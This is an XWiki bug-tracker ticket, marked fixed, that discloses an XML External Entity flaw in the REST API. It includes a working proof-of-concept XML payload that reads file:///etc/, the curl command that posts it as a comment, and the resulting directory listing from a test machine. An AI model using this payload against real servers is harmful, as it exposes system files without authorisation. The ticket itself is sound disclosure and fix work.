Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Fixed
Priority: Major
Fix Version/s: 4.1-milestone-2, 4.0.1
Affects Version/s: 4.0-rc-1
Component/s: REST
Labels:
None

Difficulty:
Unknown
Documentation:
n/a
Documentation in Release Notes:
http://www.xwiki.org/xwiki/bin/view/ReleaseNotes/ReleaseNotesXWikiEnterprise41M2#HUpgrades
Similar issues:

Description

from an email I got:

The XWiki REST API is vulnerable to an XML External Entity attack. This
vulnerability allows at least to read any file and directory accessible
to the user running the application. The following PoC will create a
comment including a listing of the '/etc/' directory.

* XML document (com.xml) :

<!DOCTYPE comment [
<!ENTITY bingo SYSTEM "file:///etc/">
]>
<comment xmlns="http://www.xwiki.org">
    <text>This is a comment. Nothing fancy but -- &bingo; -- ...</text>
</comment>

* Call to the REST API :

curl -u XXX:XXX -X POST -H "Content-type: application/xml" -H "Accept:
application/xml" -d "@com.xml"
"http://XXX/xwiki/rest/wikis/XXX/spaces/XXX/pages/XXX/comments"

Regards,
Nicolas Grégoire

repeated:

user@debo8:~$ curl -u user:passwd -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/comments"
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><comment xmlns="http://www.xwiki.org"><link rel="http://www.xwiki.org/rel/page" href="http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome"/><id>2</id><author>XWiki.user</author><date>2012-04-11T20:46:59.040-04:00</date><text>This is a comment. Nothing fancy but -- .java
.pwd.lock
acpi
adduser.conf
adjtime
aliases
alsa
alternatives
anacrontab
apache2
apm
apt
asound.names
asound.state
at.deny
avahi
bash_completion
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.tab
blkid.tab.old
bluetooth
bonobo-activation
ca-certificates
ca-certificates.conf
ca-certificates.conf.dpkg-old
calendar
chatscripts
chromium
chromium-browser
clutter-imcontext
colord.conf
compizconfig
console
ConsoleKit
console-tools
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
crypttab
cups
dbus-1
debconf.conf
debian_version
default
defoma
deluser.conf
dfs
dhcp
dhcp3
dictionaries-common
dkms
dm
dnsmasq.conf
dnsmasq.conf.dpkg-old
dnsmasq.d
doc-base
dpkg
dumpasn1
emacs
email-addresses
environment
esound
ethertypes
exim4
exports
fam.conf
festival.scm
fonts
foomatic
fop.conf.d
fstab
fstab.d
fuse.conf
gai.conf
gconf
gdb
gdm
ghostscript
gimp
gnashpluginrc
gnashrc
gnome
gnome-system-tools
gnome-vfs-2.0
gnome-vfs-mime-magic
gre.d
groff
groovy
group
group-
grub.d
gshadow
gshadow-
gssapi_mech.conf
gtk-2.0
gtk-3.0
gtkmathview
hal
hddtemp.db
hdparm.conf
hesiod.conf
host.conf
hostname
hosts
hosts.allow
hosts.deny
hp
icedove
icedtea-web
iceweasel
idmapd.conf
ImageMagick
inetd.conf
init.d
initramfs-tools
inittab
inputrc
insserv
insserv.conf
insserv.conf.d
iproute2
irssi.conf
issue
issue.net
java
java-6-cacao
java-6-openjdk
java-6-sun
javascript-common
john
kde3
kernel
kernel-img.conf
kerneloops.conf
kernel-pkg.conf
keys
kvm
labrea
ld.so.cache
ld.so.conf
ld.so.conf.d
ldap
libao.conf
libaudit.conf
libgda-3.0
libpaper.d
libreoffice
libvirt
lighttpd
locale.alias
locale.gen
localtime
logcheck
login.defs
logrotate.conf
logrotate.d
lsb-base
lvm
lynx-cur
magic
magic.mime
mail.rc
mailcap
mailcap.order
mailname
manpath.config
maven2
menu
menu-methods
mercurial
mime.types
mke2fs.conf
modprobe.d
modules
mono
motd
motd.tail
mplayer
mtab
mtools.conf
Muttrc
Muttrc.d
mysql
nanorc
netconfig
netscsid.conf
network
NetworkManager
networks
nsswitch.conf
obex-data-server
openal
OpenCL
openoffice
openvpn
opt
oss.conf
pam.conf
pam.d
pango
papersize
passwd
passwd-
perl
pm
pnm2ppa.conf
polipo
polkit-1
postgresql
postgresql-common
ppp
prelink.conf
profile
profile.d
protocols
pulse
purple
python
python2.5
python2.6
python2.7
qemu-ifup
rc.local
rc0.d
rc1.d
rc2.d
rc3.d
rc4.d
rc5.d
rc6.d
rcS.d
rearj.cfg
reportbug.conf
resolv.conf
resolvconf
rmt
rpc
rsyslog.conf
rsyslog.d
samba
sane.d
sasl2
screenrc
securetty
security
selinux
sensors.conf
sensors.d
sensors3.conf
services
sgml
shadow
shadow-
shells
skel
smartd.conf
smartmontools
smi.conf
snmp
sound
speech-dispatcher
ssh
ssl
subversion
sudoers
sudoers.d
sudoers.dpkg-dist
sysconfig
sysctl.conf
sysctl.conf.dpkg-old
sysctl.d
systemd
terminfo
texmf
timezone
timidity
tomcat5.5
tor
ts.conf
tsocks.conf
ucf.conf
udev
ufw
updatedb.conf
update-notifier
UPower
vde2
velocity
vga
vim
vpnc
w3m
wgetrc
wildmidi
wireshark
wodim.conf
wpa_supplicant
X11
xchat-systray
xdg
xen
xml
zfs
 -- ...</text><replyTo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:nil="true"/></comment>user@debo8:~$

Not repeatable with guest user even if guest is allowed to comment.

user@debo8:~$ curl -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/comments"
Error number 9001 in 9: Access denied in edit mode on document xwiki:Main.WebHomeuser@debo8:~$

Attachments

- Sort By Name
- Sort By Date
- Ascending
- Descending
- Thumbnails
- List
- Download All

jaxb-test.tar.gz
2 kB
13/Apr/12 16:00

Issue Links

relates to

XWIKI-12910 Security Hole in the XML-RPC component

Closed

Activity

People

Assignee:: CalebJamesDeLisle

Reporter:: CalebJamesDeLisle

Votes:: 0 Vote for this issue

Watchers:: 0 Start watching this issue

Dates

Created:: 12/Apr/12 02:42

Updated:: 02/Dec/22 10:56

Resolved:: 26/May/12 01:03

Date of First Response:: 13/Apr/12 4:00 PM